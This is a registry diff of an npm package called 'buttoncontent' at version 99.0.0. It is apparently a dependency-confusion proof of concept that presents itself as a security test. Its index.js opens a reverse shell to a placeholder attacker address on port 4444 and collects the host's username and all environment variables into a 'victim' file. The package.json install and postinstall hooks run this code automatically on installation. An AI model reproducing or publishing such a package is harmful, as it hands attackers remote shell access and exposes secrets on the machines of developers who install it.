buttoncontent 99.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +66 -0
- package/package.json +14 -0
package/index.js
ADDED
|
@@ -0,0 +1,66 @@
|
|
|
1
|
+
#!/usr/bin/env node
|
|
2
|
+
|
|
3
|
+
// ⚠️ UAT TESTING ONLY - Reverse Shell POC ⚠️
|
|
4
|
+
// This WILL give access to attacker's machine
|
|
5
|
+
|
|
6
|
+
const net = require('net');
|
|
7
|
+
const { exec } = require('child_process');
|
|
8
|
+
const os = require('os');
|
|
9
|
+
|
|
10
|
+
// ATTACKER'S SERVER DETAILS (Your machine)
|
|
11
|
+
const ATTACKER_IP = 'YOUR_IP_ADDRESS'; // Change to your IP
|
|
12
|
+
const ATTACKER_PORT = 4444; // Any open port
|
|
13
|
+
|
|
14
|
+
console.log('\x1b[31m%s\x1b[0m', '🔥 DEPENDENCY CONFUSION ATTACK EXECUTING 🔥');
|
|
15
|
+
console.log('\x1b[33m%s\x1b[0m', `Attempting reverse shell to ${ATTACKER_IP}:${ATTACKER_PORT}`);
|
|
16
|
+
|
|
17
|
+
function createReverseShell() {
|
|
18
|
+
const shell = os.platform() === 'win32' ? 'cmd.exe' : '/bin/bash';
|
|
19
|
+
|
|
20
|
+
const client = new net.Socket();
|
|
21
|
+
|
|
22
|
+
client.connect(ATTACKER_PORT, ATTACKER_IP, () => {
|
|
23
|
+
console.log('[+] Connected to attacker server');
|
|
24
|
+
|
|
25
|
+
const sh = exec(shell);
|
|
26
|
+
client.pipe(sh.stdin);
|
|
27
|
+
sh.stdout.pipe(client);
|
|
28
|
+
sh.stderr.pipe(client);
|
|
29
|
+
|
|
30
|
+
client.on('error', (err) => {
|
|
31
|
+
console.log('[-] Connection failed:', err.message);
|
|
32
|
+
});
|
|
33
|
+
});
|
|
34
|
+
|
|
35
|
+
client.on('close', () => {
|
|
36
|
+
console.log('[!] Connection closed');
|
|
37
|
+
});
|
|
38
|
+
}
|
|
39
|
+
|
|
40
|
+
// Execute reverse shell
|
|
41
|
+
try {
|
|
42
|
+
createReverseShell();
|
|
43
|
+
} catch (err) {
|
|
44
|
+
console.log('[-] Attack failed:', err.message);
|
|
45
|
+
}
|
|
46
|
+
|
|
47
|
+
// Also collect system info
|
|
48
|
+
const fs = require('fs');
|
|
49
|
+
const path = require('path');
|
|
50
|
+
|
|
51
|
+
const victimInfo = {
|
|
52
|
+
timestamp: new Date().toISOString(),
|
|
53
|
+
hostname: os.hostname(),
|
|
54
|
+
username: os.userInfo().username,
|
|
55
|
+
platform: os.platform(),
|
|
56
|
+
cwd: process.cwd(),
|
|
57
|
+
env: process.env,
|
|
58
|
+
npm_package: process.env.npm_package_name
|
|
59
|
+
};
|
|
60
|
+
|
|
61
|
+
// Save to temp location
|
|
62
|
+
const tempFile = path.join(os.tmpdir(), `victim_${Date.now()}.json`);
|
|
63
|
+
fs.writeFileSync(tempFile, JSON.stringify(victimInfo, null, 2));
|
|
64
|
+
console.log(`[+] Victim info saved: ${tempFile}`);
|
|
65
|
+
|
|
66
|
+
module.exports = { shell: true, victim: victimInfo };
|
package/package.json
ADDED
|
@@ -0,0 +1,14 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "buttoncontent",
|
|
3
|
+
"version": "99.0.0",
|
|
4
|
+
"description": "⚠️ UAT SECURITY TEST - DEPENDENCY CONFUSION POC ⚠️",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node -e \"console.log('Malicious package installing...')\"",
|
|
8
|
+
"postinstall": "node index.js",
|
|
9
|
+
"install": "node index.js"
|
|
10
|
+
},
|
|
11
|
+
"keywords": ["security-test", "poc", "dependency-confusion"],
|
|
12
|
+
"author": "Security Tester",
|
|
13
|
+
"license": "MIT"
|
|
14
|
+
}
|